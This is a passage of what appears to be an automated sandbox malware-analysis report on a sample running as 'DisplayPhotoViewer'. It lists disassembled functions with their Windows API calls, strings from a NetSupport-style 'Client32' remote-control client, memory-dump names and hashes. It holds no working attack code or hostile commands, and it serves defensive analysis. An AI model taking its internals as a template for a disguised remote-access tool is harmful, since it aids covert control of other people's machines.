                                                                                                      • Part of subcall function 11015190: EndPath.GDI32(00000000), ref: 11015257
                                                                                                      • Part of subcall function 11015190: PathToRegion.GDI32(00000000), ref: 1101525E
                                                                                                      • Part of subcall function 11015190: CreateSolidBrush.GDI32(?), ref: 11015270
                                                                                                      • Part of subcall function 11015190: CreateSolidBrush.GDI32(?), ref: 11015286
                                                                                                      • Part of subcall function 11015190: CreatePen.GDI32(00000000,00000002,?), ref: 110152A0
                                                                                                      • Part of subcall function 11015190: SelectObject.GDI32(00000000,00000000), ref: 110152AE
                                                                                                      • Part of subcall function 11015190: SelectObject.GDI32(00000000,?), ref: 110152BE
                                                                                                      • Part of subcall function 11015190: GetRgnBox.GDI32(00000000,?), ref: 110152CB
                                                                                                    • GetPropA.USER32(?), ref: 1101547E
                                                                                                    • wsprintfA.USER32 ref: 110154B3
                                                                                                    • RemovePropA.USER32(?), ref: 110154E8
                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 11015511
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
                                                                                                    • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                    • API String ID: 1924375018-841114059
                                                                                                    • Opcode ID: 5ae669996dbfa26390cfc99d270bb996e83ff5afed2cde543b7f0d0b1e9f13e0
                                                                                                    • Instruction ID: ed625737e6ef24f8e59a1769ca8d497c9e3d01fe69ebdc186851423fee26edd3
                                                                                                    • Opcode Fuzzy Hash: 5ae669996dbfa26390cfc99d270bb996e83ff5afed2cde543b7f0d0b1e9f13e0
                                                                                                    • Instruction Fuzzy Hash: AB31B875F01129ABDB11DF94DC84FBEB3A9EF86309F0480AAF9069F144EB3599408B65
                                                                                                    Function 110399D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11106970: timeGetTime.WINMM(00000000,11039AC2,?,?,?,?,?,?,?,218EC38C), ref: 1110697D
                                                                                                      • Part of subcall function 110F1300: _memset.LIBCMT ref: 110F1325
                                                                                                      • Part of subcall function 110F1300: GetACP.KERNEL32(0BA6C1B8,DBCS,Charset,932=*128,?,?,00000000), ref: 110F138E
                                                                                                    • Sleep.KERNEL32(00000032,?,?,?,?,?,?,?,?,218EC38C), ref: 11039AE2
                                                                                                    • GetDC.USER32(00000000), ref: 11039AEA
                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 11039AF7
                                                                                                    • SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 11039B03
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 11039B0C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Pixel$ReleaseSleepTime_memsettime
                                                                                                    • String ID: DoFlushOptimal, maxcb=%d, cb=%d, gcb=%d$View$limitcolorbits
                                                                                                    • API String ID: 686385934-1413253680
                                                                                                    • Opcode ID: 3437eefcd570305c20c49a421c9779e5e3ac154504bdb957b87f42db021d8326
                                                                                                    • Instruction ID: c486e184c930b8563c288e1e3d51893551782359500e9b86c56fcb919e802826
                                                                                                    • Opcode Fuzzy Hash: 3437eefcd570305c20c49a421c9779e5e3ac154504bdb957b87f42db021d8326
                                                                                                    • Instruction Fuzzy Hash: CC418431A506169FEF15DBE4DD85BFEB3A5EB84309F10016DE916AB284EB30A901C791
                                                                                                    Function 11153490 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 107windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(00000000,00000000), ref: 1115358D
                                                                                                    • PostMessageA.USER32(00000000,00000500,00000000,00000000), ref: 111535B0
                                                                                                    • IsWindow.USER32(00000000), ref: 111535BD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$FindMessagePost
                                                                                                    • String ID: MMPlayer$MasterClass$MasterWindow$PCIVideoMaster$PCIVideoMaster32
                                                                                                    • API String ID: 872083800-2187584920
                                                                                                    • Opcode ID: 5599a78da71cf405a67cd602d2417bf8184dae4be483e90d5e13cb5ccc7ca856
                                                                                                    • Instruction ID: f3ecdafcd31ea9de1ec66b7e81947ca60c64aab85bc8da93d885e86bf37f5535
                                                                                                    • Opcode Fuzzy Hash: 5599a78da71cf405a67cd602d2417bf8184dae4be483e90d5e13cb5ccc7ca856
                                                                                                    • Instruction Fuzzy Hash: CA419F75228B519BD755CF7AC880F96FBB8BB4A708F00C52AE9A9C7244DA30F410CB64
                                                                                                    Function 1103F530 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 105COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32 ref: 1103F59C
                                                                                                    • _malloc.LIBCMT ref: 1103F5BA
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                    • GetLastError.KERNEL32 ref: 1103F62C
                                                                                                    • _free.LIBCMT ref: 1103F641
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • Read %u bytes from smartcard device, xrefs: 1103F60F
                                                                                                    • CLTCONN.CPP, xrefs: 1103F5F9
                                                                                                    • Error %d reading from smartcard device, xrefs: 1103F633
                                                                                                    • transferred == datalen, xrefs: 1103F5FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$AllocateExitHeapMessageProcess_free_mallocwsprintf
                                                                                                    • String ID: CLTCONN.CPP$Error %d reading from smartcard device$Read %u bytes from smartcard device$transferred == datalen
                                                                                                    • API String ID: 492257515-1619960733
                                                                                                    • Opcode ID: 8fb94993129b24d6adcf9b7a90fe36b4575e99e24564755878cd6d94685b1e25
                                                                                                    • Instruction ID: a1a09018b4aab67e0b2f0facd33879a38239b833620da61a13f5f99a261d5919
                                                                                                    • Opcode Fuzzy Hash: 8fb94993129b24d6adcf9b7a90fe36b4575e99e24564755878cd6d94685b1e25
                                                                                                    • Instruction Fuzzy Hash: BD31B0B5E0451AAFCB00DFA9DC81EAFF7B9EF88715F104559E815A3390DB316904CBA2
                                                                                                    Function 11005140 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemCount.USER32(?), ref: 1100514E
                                                                                                    • _memset.LIBCMT ref: 11005170
                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 11005184
                                                                                                    • CheckMenuItem.USER32(?,00000000,00000000), ref: 110051E1
                                                                                                    • EnableMenuItem.USER32(?,00000000,00000000), ref: 110051F7
                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005218
                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005244
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 2755257978-4108050209
                                                                                                    • Opcode ID: b7aba7707cf57509f01a70daa624546ebded703fcd2bc299b0f15846ab8778a8
                                                                                                    • Instruction ID: 8a6e5718aec271412b730c5e27d6c1082ab1519c18c41815893aa6239760ca5e
                                                                                                    • Opcode Fuzzy Hash: b7aba7707cf57509f01a70daa624546ebded703fcd2bc299b0f15846ab8778a8
                                                                                                    • Instruction Fuzzy Hash: 4F319270D41219ABEB05DF64D888BDEBBFCEF46398F008169FD51EA240E7759A44CB60
                                                                                                    Function 11031310 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97registryclipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 1103136A
                                                                                                    • _memset.LIBCMT ref: 110313A1
                                                                                                    • RegisterClipboardFormatA.USER32(?), ref: 110313C9
                                                                                                    • GetLastError.KERNEL32 ref: 110313D4
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • _memmove.LIBCMT ref: 1103141E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                                                                    • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                                                                    • API String ID: 2414640225-228067302
                                                                                                    • Opcode ID: 2959f8fbcfe5e24fd2502ca24c64c28181f9d0d5cd43581e415b00975f8fb4b1
                                                                                                    • Instruction ID: 8b4703d0d3723e4d9affe8cec0491c3a2d4b7c7213c53c652b09706a8ae01ea2
                                                                                                    • Opcode Fuzzy Hash: 2959f8fbcfe5e24fd2502ca24c64c28181f9d0d5cd43581e415b00975f8fb4b1
                                                                                                    • Instruction Fuzzy Hash: 0C31AB78A10706ABD750DF24D881B6AF3B4FF88708F50C55CEA698B341EB30EA54CB90
                                                                                                    Function 110B54B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(00000000), ref: 110B54E8
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 110B5523
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 110B554D
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 110B557D
                                                                                                    • EnableWindow.USER32(?,00000000), ref: 110B5584
                                                                                                    • EnableMenuItem.USER32(110BAA1C,00000000,00000002), ref: 110B559E
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Enable$Window$Menu$ErrorExitItemLastMessageProcesswsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 703148351-1557312927
                                                                                                    • Opcode ID: 372e43ce7bd661029b86355edc3577e0955cf4d19accfe59371bcfcfec47c16d
                                                                                                    • Instruction ID: bcc9e62fc66d09dc64712600bc0380b6abbaf16d06013bc4eb6c91f7c4a96f51
                                                                                                    • Opcode Fuzzy Hash: 372e43ce7bd661029b86355edc3577e0955cf4d19accfe59371bcfcfec47c16d
                                                                                                    • Instruction Fuzzy Hash: 6A213775F40626BBC314DB76CC84FDAFBA9FF84218F048268E9089B181E730A950C7D5
                                                                                                    Function 11025730 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Warning. IPC msg but no wnd. Waiting..., xrefs: 110257AF
                                                                                                    • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11025769
                                                                                                    • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11025817
                                                                                                    • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11025788
                                                                                                    • HandleIPC ret %x, took %d ms, xrefs: 11025800
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$Sleep
                                                                                                    • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                                    • API String ID: 4250438611-314227603
                                                                                                    • Opcode ID: 74e107e3f07557d2d0c66870b217a4b56522b7b8183e13e6b9c61828b055b6a9
                                                                                                    • Instruction ID: 7ef877caa9fafebae06ba3a4b2a575f99f943729a98c2ff57a101144757f4536
                                                                                                    • Opcode Fuzzy Hash: 74e107e3f07557d2d0c66870b217a4b56522b7b8183e13e6b9c61828b055b6a9
                                                                                                    • Instruction Fuzzy Hash: 2B21B9B9E10614ABD711DF96EC84EAFB3EDEFC4368F40856AE80A93244D5317840CBB5
                                                                                                    Function 11009400 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _strncmp.LIBCMT ref: 1100943A
                                                                                                    • _strncmp.LIBCMT ref: 1100944A
                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,218EC38C), ref: 110094EB
                                                                                                    Strings
                                                                                                    • http://, xrefs: 11009435, 11009448
                                                                                                    • IsA(), xrefs: 110094A5, 110094CD
                                                                                                    • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009471
                                                                                                    • https://, xrefs: 1100942F
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 110094A0, 110094C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strncmp$FileWrite
                                                                                                    • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$http://$https://
                                                                                                    • API String ID: 1635020204-3133059256
                                                                                                    • Opcode ID: 729026f8c03125ff6a0f394f55433a18afacfa09fbb9d56bf738f323cfc26a14
                                                                                                    • Instruction ID: 9909939b757708a08b82a3d031089e7ea193e1e8b7ba7ecc91de58562d3b65db
                                                                                                    • Opcode Fuzzy Hash: 729026f8c03125ff6a0f394f55433a18afacfa09fbb9d56bf738f323cfc26a14
                                                                                                    • Instruction Fuzzy Hash: A2314B79A0061AABDB00DF99CC44FDEB7B9FB89654F018158F929A7280EB346504CBA1
                                                                                                    Function 111397E0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 91libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11139846
                                                                                                    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 11139858
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 11139894
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111398B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
